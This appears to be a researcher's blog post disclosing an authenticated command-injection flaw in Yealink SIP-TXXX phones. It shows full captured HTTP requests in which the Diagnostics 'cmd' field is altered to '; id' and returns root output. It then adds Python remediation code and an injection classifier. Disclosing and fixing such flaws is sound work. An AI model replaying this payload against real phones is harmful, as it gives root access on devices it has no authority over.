Do you love hacking phones? VoIP phones, of course. This should be worth a read!

I just uncovered a vulnerability in Yealink SIP-TXXX phones. It leads to RCE, but it is authenticated, meaning you must be logged in to the web interface first!


Proof Of Concept

After logging in to the web interface, which may be served on port 80 or port 443, there is a Network tab. Clicking on it shows five sections: Basic, PC Port, NAT, Advanced, and Diagnostics. Clicking on Diagnostics,


there we can ping or traceroute an IP address. Capturing that request with Burp Suite reveals what the whole request looks like and how the parameters are sent with their values:


POST /servlet?m=mod_data&p=network-diagnosis&q=docmd&Rajax=0.890925468511929 HTTP/1.1
Host: xxx.xxx.xxx.xxx
Content-Length: 49
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept: */*
Origin: http://xxx.xxx.xxx.xxx
Referer: http://xxx.xxx.xxx.xxx/servlet?m=mod_data&p=network-diagnosis&q=load
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: JSESSIONID=9a83d24461329a130
Connection: close

cmd=start ping 127.0.0.1&token=1714636915c6acea98

So the cmd parameter takes the value start followed by the command to execute, ping 127.0.0.1. I thought of it as an easy win and changed the value of cmd so that a basic Linux command is executed instead of ping:

cmd=; id;&token=1714636915c6acea98

and now it executes the id command instead!


POST REQUEST

POST /servlet?m=mod_data&p=network-diagnosis&q=docmd&Rajax=0.6597899560162612 HTTP/1.1
Host: xxx.xxx.xxx.xxx
Content-Length: 33
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept: */*
Origin: http://xxx.xxx.xxx.xxx
Referer: http://xxx.xxx.xxx.xxx/servlet?m=mod_data&p=network-diagnosis&q=load
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: JSESSIONID=9a83d2446809c4f88
Connection: close

cmd=; id&token=1957747793cee22738

RESPONSE

HTTP/1.1 200 OK
Content-Type: text/html
Connection: close
Date: Wed, 10 Nov 2021 14:20:23 GMT
Server: embed httpd
Content-Length: 82

<html>
<body>
	<div id="_RES_INFO_">
            uid=0(root) gid=0(root)
        </div>
</body>
</html>

And there we have RCE! :100:
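The root cause is that the cmd value is handed to a shell, so the fix on the server side is to stop building a shell string and instead validate cmd against the exact grammar the Diagnostics page is meant to send, then invoke the tool with an argv list and no shell. The Python below is an added example written for this post; it is not Yealink firmware code and not the author's. It assumes the only legitimate forms are "start ping <ip>" and "start traceroute <ip>" (inferred from the captured request above), that targets are literal IP addresses, and that a fixed ping count is acceptable. The same parser doubles as a classification check over request bodies sent to the docmd endpoint, usable for log review or a reverse-proxy rule; two of the sample bodies are the ones on this page, the rest are constructed.

```python
import ipaddress
import re
import subprocess
from urllib.parse import unquote_plus

# Assumed grammar of the Diagnostics "cmd" value, inferred from the captured
# request on this page: "start ping <ip>" or "start traceroute <ip>".
# (Yealink's real firmware is not available here; this is an added example.)
CMD_RE = re.compile(r"^start (ping|traceroute) (\S+)$")

# Characters that have meaning to /bin/sh; used only to label rejected input.
SHELL_META = re.compile(r"[;&|`$(){}<>\n\\]")


def parse_form(body):
    """Minimal x-www-form-urlencoded parser (first value wins per key)."""
    fields = {}
    for pair in body.split("&"):
        if not pair:
            continue
        key, _, value = pair.partition("=")
        fields.setdefault(unquote_plus(key), unquote_plus(value))
    return fields


def parse_diag_cmd(cmd):
    """Return (tool, ip_text) for a well-formed cmd, or None for anything else.

    The regex only splits the tokens; the real gate is ipaddress.ip_address,
    which rejects any target that is not a literal IPv4/IPv6 address.
    """
    m = CMD_RE.fullmatch(cmd)
    if m is None:
        return None
    tool, target = m.group(1), m.group(2)
    try:
        ip = ipaddress.ip_address(target)
    except ValueError:
        return None
    return tool, str(ip)


def build_argv(cmd):
    """argv list for subprocess.run(..., shell=False), or None if cmd is rejected.

    Because the target is passed as one argv element and no shell is involved,
    metacharacters in it can never be interpreted as a second command.
    """
    parsed = parse_diag_cmd(cmd)
    if parsed is None:
        return None
    tool, ip = parsed
    if tool == "ping":
        return ["ping", "-c", "4", ip]
    return ["traceroute", ip]


def run_diag(cmd, timeout=30):
    """Run a validated diagnostic without a shell; raises ValueError on bad input."""
    argv = build_argv(cmd)
    if argv is None:
        raise ValueError("cmd does not match the diagnostics grammar")
    return subprocess.run(argv, capture_output=True, text=True, timeout=timeout).stdout


def classify_body(body):
    """Label a request body to /servlet?...&q=docmd for log review or a proxy rule."""
    cmd = parse_form(body).get("cmd")
    if cmd is None:
        return "malformed"          # no cmd field at all
    if parse_diag_cmd(cmd) is not None:
        return "ok"                 # exactly what the Diagnostics page sends
    if SHELL_META.search(cmd):
        return "injection_attempt"  # fails grammar and carries shell syntax
    return "rejected"               # fails grammar (e.g. a hostname), no shell syntax


if __name__ == "__main__":
    # First two bodies are taken from this page; the rest are constructed samples.
    samples = [
        "cmd=start ping 127.0.0.1&token=1714636915c6acea98",
        "cmd=; id&token=1957747793cee22738",
        "cmd=start+traceroute+192.0.2.10&token=constructed",
        "cmd=start ping 127.0.0.1; id&token=constructed",
        "cmd=start ping example.com&token=constructed",
        "token=constructed",
    ]
    for body in samples:
        print(f"{classify_body(body):18} {body}")
```

Note that the form parser itself splits on "&", so an injected "&" never reaches cmd; the "ok" label is deliberately an exact-grammar match rather than a blocklist, because a blocklist of metacharacters is what an attacker works around, while a parser that only ever produces an argv list leaves nothing for a shell to interpret.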

Contact : Twitter: tahaafarooq, Telegram : tahaafarooq